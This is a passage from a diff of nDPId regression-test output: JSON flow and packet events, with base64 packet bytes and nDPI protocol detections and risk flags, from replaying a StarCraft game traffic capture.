-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968525,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGW1AAIAG7gDAqAFkAuQucg2YAbs5x3Vh1+NhgVAUAADEjQAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968541,"pkt":"IImEa8W6hCYVPnXECABFAABdD8xAADkGPncC5C5owKgBZAG7DaEXdnI2KPa\/clAYAi2WsQAAFQMCADDEyuty98HROVf0C9dCpYEUA7Jug9PX6pMmtPtLY+MIAZP0XBy+LRgi1JBN1q929Nc="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968541,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaE5AAIAGnynAqAFkAuQuaA2hAbso9r9yF3Zya1AUAAA60gAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUtAAPIGObXHJqScwKgBZAG7DZ7bDuslZeBiaVAQFLnPdAAAAAAAAAAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUxAAPIGObTHJqScwKgBZAG7DZ7bDuslZeBiaVARFLnPcwAAAAAAAAAA"} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} 
+01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEBAAIAGnzfAqAFkAuQuaA2hAbso9r9xF3ZyNlARAP06DgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEFAAIAGnzbAqAFkAuQuaA2iAbuuMy\/9hNS6Y1ARAQCOtQAA"} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEJAAIAGnzXAqAFkAuQuaA2jAbuWFKpTUfGXQ1ARBFh\/KAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWNAAIAG7grAqAFkAuQucg2aAbv4rJBdJdjUo1ARAP0omQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWRAAIAG7gnAqAFkAuQucg2YAbs5x3Vg1+NhTFARAQDDxgAA"} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWVAAIAG7gjAqAFkAuQucg2ZAbvryQjoVlrkVFARAQB8vAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWZAAIAG7gfAqAFkAuQucg2XAbvNUW978CZu3VARBF0M8QAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoPo5AAIAGjnLAqAFkxyaknA2eAbtl4GJo2w7rJVAR9fPuOQAA"} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968488,"flow_last_seen":1437389968488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968488,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1437389968488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968488,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDZAAIAGrOrAqAFkrcJx4A2cAbsxkmlKz83WwVARAP18ZAAA"} +00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdOZFAADkGFKgC5C5ywKgBZAG7DZol2NSj+KyQXlAYAk8nagAAFQMCADAMud3SaYTsSqa\/uoo0a5E8VCc4Xkt3IWOikvjNzbZ6\/KN17SBOZ1wiAn+Wb8fZvA4="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWdAAIAG7gbAqAFkAuQucg2aAbv4rJBeJdjU2FAUAAApXQAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdHrRAADkGL4UC5C5ywKgBZAG7DZfwJm7dzVFvfFAYAvbMYQAAFQMCADAisnLQsHrL1EoW2shNoX67xhkXstAI1yd6wVWuICpme1diCl2In\/GtYthhkjE1BS4="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWhAAIAG7gXAqAFkAuQucg2XAbvNUW988CZvElAUAAARFQAA"} 
+00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdZwtAADkG5y0C5C5ywKgBZAG7DZlWWuRU68kI6VAYAk+37QAAFQMCADBkKOWBHzDl37wozuIxUqGksDGbpGilDaRqgrJ95jL33eBT4nQmWu5qzsKHkzuYbBI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWlAAIAG7gTAqAFkAuQucg2ZAbvryQjpVlrkiVAUAAB9gwAA"} +00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968520,"pkt":"IImEa8W6hCYVPnXECABFAABdGMVAADkGNX4C5C5owKgBZAG7DaRcpvlx40yFpFAYAi2\/cgAAFQMCADCHvY3Mj+EIqhLZWr7xkOkCQpCu81AAuIN2GL29a+w7fDrgr\/wsC4qtrqrTilg07F0="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEpAAIAGny3AqAFkAuQuaA2kAbvjTIWkXKb5plAUAADt2gAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABd0ZRAADkGfK4C5C5owKgBZAG7DaKE1LpjrjMv\/lAYAi2OuwAAFQMCADAOk8uVyOotmLX2HoTUFpC+IVWXwl6ab8qQjuO+KPoI4xJC+fUMLiJl2rPTnnO4+D0="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEtAAIAGnyzAqAFkAuQuaA2iAbuuMy\/+hNS6mFAUAACPfAAA"} 